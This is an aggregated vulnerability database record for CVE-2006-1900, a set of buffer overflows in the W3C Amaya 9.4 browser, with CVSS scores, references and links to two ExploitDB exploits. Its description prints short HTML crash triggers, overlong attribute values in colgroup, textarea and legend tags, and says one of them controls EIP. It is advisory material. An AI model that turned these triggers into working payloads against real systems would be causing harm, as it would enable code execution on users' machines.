CVE-2006-1900 (CNNVD-200604-389)

HIGH Exploit code available
Chinese title:
W3C Amaya multiple remote overflow vulnerabilities
English title:
Multiple buffer overflows in World Wide Web Consortium (W3C) Amaya 9.4, and possibly other versions ...
CVSS score: 7.6
Published: 2006-04-20 10:00:00
Vulnerability type: Authorization issue
Status: PUBLISHED
Data quality score: 0.40
Data version: v5
Vulnerability description
Chinese description:

W3C's Amaya is a WYSIWYG Web browser and authoring tool. The Amaya implementation contains multiple vulnerabilities that may allow a remote attacker to crash the program or execute arbitrary instructions.

The following snippets (and possibly other similar ones) can force Amaya to crash:

<colgroup compact="Ax200">
[...]
<textarea rows="Ax200">

A long value in the rows attribute of <textarea> makes it possible to control EIP.

In addition, the following snippet can also crash Amaya 9.4:

<legend color="Ax200">

English description:

Multiple buffer overflows in World Wide Web Consortium (W3C) Amaya 9.4, and possibly other versions including 8.x before 8.8.5, allow remote attackers to execute arbitrary code via a long value in (1) the COMPACT attribute of the COLGROUP element, (2) the ROWS attribute of the TEXTAREA element, and (3) the COLOR attribute of the LEGEND element; and via other unspecified attack vectors consisting of "dozens of possible snippets."

CWE type:
(No data)
Tags:
dos multiple Thomas Waldegger OSVDB-24623 OSVDB-24624
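Affected products
Vendor | Product | Version | Version range | Platform | CPE
w3c | amaya | 9.4 | - | - | cpe:2.3:a:w3c:amaya:9.4:*:*:*:*:*:*:*
Solution
Chinese solution:
(No data)
English solution:
(No data)
Workaround:
(No data)
References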
ADV-2006-1351 (vdb-entry, cve.org)
20060412 [BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 (mailing-list, cve.org)
Untitled (x_refsource_MISC, cve.org)
19670 (third-party-advisory, cve.org)
17507 (vdb-entry, cve.org)
24624 (vdb-entry, cve.org)
amaya-various-attribute-bo(25791) (vdb-entry, cve.org)
20060412 [BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2 (mailing-list, cve.org)
24623 (vdb-entry, cve.org)
Untitled (x_refsource_MISC, cve.org)
ExploitDB EDB-27639 (EXPLOIT, exploitdb)
Download Exploit EDB-27639 (EXPLOIT, exploitdb)
CVE Reference: CVE-2006-1900 (ADVISORY, cve.org)
ExploitDB EDB-27640 (EXPLOIT, exploitdb)
Download Exploit EDB-27640 (EXPLOIT, exploitdb)
CVSS score details
7.6
HIGH
CVSS vector: AV:N/AC:H/Au:N/C:C/I:C/A:C
CVSS version: 2.0
Confidentiality: COMPLETE
Integrity: COMPLETE
Availability: COMPLETE
Time information
Published: 2006-04-20 10:00:00
Modified: 2024-08-07 17:27:29
Created: 2025-11-11 15:32:33
Updated: 2026-01-19 09:42:11
Exploit information
Exploit code is available for this vulnerability!
Number of exploits: 2
Exploit sources:
Unknown Unknown
Data source details
Data source | Record ID | Version | Extraction time
CVE | cve_CVE-2006-1900 | 2025-11-11 15:17:41 | 2025-11-11 07:32:33
NVD | nvd_CVE-2006-1900 | 2025-11-11 14:51:48 | 2025-11-11 07:41:19
CNNVD | cnnvd_CNNVD-200604-389 | 2025-11-11 15:08:51 | 2025-11-11 07:49:06
EXPLOITDB | exploitdb_EDB-27639 | 2025-11-11 15:05:27 | 2025-11-11 08:23:41
EXPLOITDB | exploitdb_EDB-27640 | 2025-11-11 15:05:27 | 2025-11-11 08:23:41
Version and language
Current version: v5
Primary language: EN
Supported languages:
EN ZH
Other identifiers:
Security advisories
No security advisory information available
Change history
v5 EXPLOITDB
2025-11-11 16:23:41
  • references_count: 13 -> 15
  • tags_count: 4 -> 5
v4 EXPLOITDB
2025-11-11 16:23:41
  • references_count: 10 -> 13
  • tags_count: 0 -> 4
  • data_sources: ['cnnvd', 'cve', 'nvd'] -> ['cnnvd', 'cve', 'exploitdb', 'nvd']
v3 CNNVD
2025-11-11 15:49:06
  • vulnerability_type: not extracted -> Authorization issue
  • cnnvd_id: not extracted -> CNNVD-200604-389
  • data_sources: ['cve', 'nvd'] -> ['cnnvd', 'cve', 'nvd']
v2 NVD
2025-11-11 15:41:19
  • severity: SeverityLevel.MEDIUM -> SeverityLevel.HIGH
  • cvss_score: not extracted -> 7.6
  • cvss_vector: NOT_EXTRACTED -> AV:N/AC:H/Au:N/C:C/I:C/A:C
  • cvss_version: NOT_EXTRACTED -> 2.0
  • affected_products_count: 0 -> 1
  • data_sources: ['cve'] -> ['cve', 'nvd']